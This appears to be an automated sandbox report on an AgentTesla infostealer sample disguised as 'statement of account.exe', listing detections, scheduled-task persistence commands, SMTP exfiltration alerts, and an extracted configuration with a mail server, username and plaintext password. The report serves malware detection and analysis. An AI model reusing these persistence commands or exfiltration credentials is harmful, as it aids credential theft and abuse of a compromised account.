Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
statement of account.exe

Overview

General Information

Sample Name:statement of account.exe
Analysis ID:756035
MD5:808f76963a9f42ad7310a3b7d65c7983
SHA1:f748a841b2ec35bc40ed0bacbe953c28bc11a8a6
SHA256:9f04b0b059e331845f8c3f9f4f83c785b07766529bb24dbbfb02fbab9e414938
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • statement of account.exe (PID: 3184 cmdline: C:\Users\user\Desktop\statement of account.exe MD5: 808F76963A9F42AD7310A3B7D65C7983)
    • schtasks.exe (PID: 5144 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • LtdekfbHULJt.exe (PID: 1172 cmdline: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe MD5: 808F76963A9F42AD7310A3B7D65C7983)
    • schtasks.exe (PID: 4080 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp4337.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • LtdekfbHULJt.exe (PID: 4984 cmdline: {path} MD5: 808F76963A9F42AD7310A3B7D65C7983)
  • LIhMQ.exe (PID: 5448 cmdline: "C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe" MD5: 808F76963A9F42AD7310A3B7D65C7983)
    • schtasks.exe (PID: 5380 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp26F5.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • LIhMQ.exe (PID: 5332 cmdline: {path} MD5: 808F76963A9F42AD7310A3B7D65C7983)
    • LIhMQ.exe (PID: 2888 cmdline: {path} MD5: 808F76963A9F42AD7310A3B7D65C7983)
  • LIhMQ.exe (PID: 1920 cmdline: "C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe" MD5: 808F76963A9F42AD7310A3B7D65C7983)
  • cleanup
{"Exfil Mode": "SMTP", "Host": "mail.clipjoint.co.nz", "Username": "clipjoint@clipjoint.co.nz", "Password": "melandloz64"}
SourceRuleDescriptionAuthorStrings
00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x2ff7c:$a13: get_DnsResolver
      • 0x2e71d:$a20: get_LastAccessed
      • 0x3090e:$a27: set_InternalServerPort
      • 0x30c2b:$a30: set_GuidMasterKey
      • 0x2e824:$a33: get_Clipboard
      • 0x2e832:$a34: get_Keyboard
      • 0x2fb97:$a35: get_ShiftKeyDown
      • 0x2fba8:$a36: get_AltKeyDown
      • 0x2e83f:$a37: get_Password
      • 0x2f32f:$a38: get_PasswordHash
      • 0x30379:$a39: get_DefaultCredentials
      00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          Click to see the 17 entries
          SourceRuleDescriptionAuthorStrings
          0.2.statement of account.exe.3eca3f0.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0.2.statement of account.exe.3eca3f0.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              0.2.statement of account.exe.3eca3f0.1.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x30c63:$s10: logins
              • 0x306bf:$s11: credential
              • 0x2cc24:$g1: get_Clipboard
              • 0x2cc32:$g2: get_Keyboard
              • 0x2cc3f:$g3: get_Password
              • 0x2df87:$g4: get_CtrlKeyDown
              • 0x2df97:$g5: get_ShiftKeyDown
              • 0x2dfa8:$g6: get_AltKeyDown
              0.2.statement of account.exe.3eca3f0.1.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x2e37c:$a13: get_DnsResolver
              • 0x2cb1d:$a20: get_LastAccessed
              • 0x2ed0e:$a27: set_InternalServerPort
              • 0x2f02b:$a30: set_GuidMasterKey
              • 0x2cc24:$a33: get_Clipboard
              • 0x2cc32:$a34: get_Keyboard
              • 0x2df97:$a35: get_ShiftKeyDown
              • 0x2dfa8:$a36: get_AltKeyDown
              • 0x2cc3f:$a37: get_Password
              • 0x2d72f:$a38: get_PasswordHash
              • 0x2e779:$a39: get_DefaultCredentials
              3.0.statement of account.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 13 entries

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\statement of account.exe, ParentImage: C:\Users\user\Desktop\statement of account.exe, ParentProcessId: 3184, ParentProcessName: statement of account.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp, ProcessId: 5144, ProcessName: schtasks.exe
                Timestamp:192.168.2.327.54.86.236496985872030171 11/29/22-15:00:43.881102
                SID:2030171
                Source Port:49698
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.327.54.86.236496995872851779 11/29/22-15:01:36.844935
                SID:2851779
                Source Port:49699
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.327.54.86.236497005872030171 11/29/22-15:02:05.481443
                SID:2030171
                Source Port:49700
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.327.54.86.236496995872840032 11/29/22-15:01:36.844935
                SID:2840032
                Source Port:49699
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.327.54.86.236496995872030171 11/29/22-15:01:36.844935
                SID:2030171
                Source Port:49699
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.327.54.86.236496985872840032 11/29/22-15:00:43.881210
                SID:2840032
                Source Port:49698
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.327.54.86.236497005872840032 11/29/22-15:02:05.481443
                SID:2840032
                Source Port:49700
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.327.54.86.236496985872851779 11/29/22-15:00:43.881210
                SID:2851779
                Source Port:49698
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.327.54.86.236497005872851779 11/29/22-15:02:05.481443
                SID:2851779
                Source Port:49700
                Destination Port:587
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: statement of account.exeReversingLabs: Detection: 69%
                Source: statement of account.exeVirustotal: Detection: 36%Perma Link
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeReversingLabs: Detection: 69%
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeReversingLabs: Detection: 69%
                Source: statement of account.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeJoe Sandbox ML: detected
                Source: 3.0.statement of account.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 3.0.statement of account.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.clipjoint.co.nz", "Username": "clipjoint@clipjoint.co.nz", "Password": "melandloz64"}
                Source: statement of account.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: statement of account.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: 1xOMKkLm.pdb source: statement of account.exe, LtdekfbHULJt.exe.0.dr, LIhMQ.exe.3.dr
                Source: Binary string: 1xOMKkLm.pdbSHA256 source: statement of account.exe, LtdekfbHULJt.exe.0.dr, LIhMQ.exe.3.dr

                Networking

                barindex
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49698 -> 27.54.86.236:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49698 -> 27.54.86.236:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49698 -> 27.54.86.236:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49699 -> 27.54.86.236:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49699 -> 27.54.86.236:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49699 -> 27.54.86.236:587
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49700 -> 27.54.86.236:587
                Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.3:49700 -> 27.54.86.236:587
                Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49700 -> 27.54.86.236:587
                Source: Joe Sandbox ViewASN Name: DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU
                Source: Joe Sandbox ViewIP Address: 27.54.86.236 27.54.86.236
                Source: global trafficTCP traffic: 192.168.2.3:49698 -> 27.54.86.236:587
                Source: global trafficTCP traffic: 192.168.2.3:49698 -> 27.54.86.236:587
                Source: statement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://MFxeXD.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: statement of account.exe, 00000003.00000002.539956248.0000000003374000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.538143319.00000000033EE000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.539916642.0000000002D39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.clipjoint.co.nz
                Source: statement of account.exe, 00000000.00000002.283918247.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000004.00000002.408840433.0000000002784000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: statement of account.exe, 00000000.00000002.297389209.0000000006CD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: LtdekfbHULJt.exe, 00000016.00000002.539916642.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://6B3frV1LW6oD.com
                Source: statement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                Source: statement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%mail.clipjoint.co.nzclipjoint
                Source: statement of account.exe, 00000003.00000002.524328070.000000000301C000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.522475390.0000000003091000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000016.00000002.522684815.0000000002991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknownDNS traffic detected: queries for: mail.clipjoint.co.nz

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Users\user\Desktop\statement of account.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\statement of account.exe
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe
                Source: statement of account.exe, 00000000.00000002.281387531.0000000001008000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\statement of account.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeWindow created: window name: CLIPBRDWNDCLASS

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Source: C:\Users\user\Desktop\statement of account.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                System Summary

                barindex
                Source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.statement of account.exe.2d88c08.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: 14.2.LIhMQ.exe.2fd8c00.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
                Source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: statement of account.exe PID: 3184, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: statement of account.exe PID: 1568, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 3.0.statement of account.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bB3FCD477u002d0AFFu002d4F50u002d9D97u002d53C1AE5E5EF7u007d/u00344619352u002d7691u002d445Bu002d9250u002dC24E2EA20EC7.csLarge array initialization: .cctor: array initializer size 10581
                Source: statement of account.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.statement of account.exe.3eca3f0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 3.0.statement of account.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.statement of account.exe.3eca3f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.statement of account.exe.2d88c08.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 14.2.LIhMQ.exe.2fd8c00.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
                Source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.statement of account.exe.3e1dba0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000003.00000000.271494220.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000000.00000002.290824392.0000000003D9C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: Process Memory Space: statement of account.exe PID: 3184, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
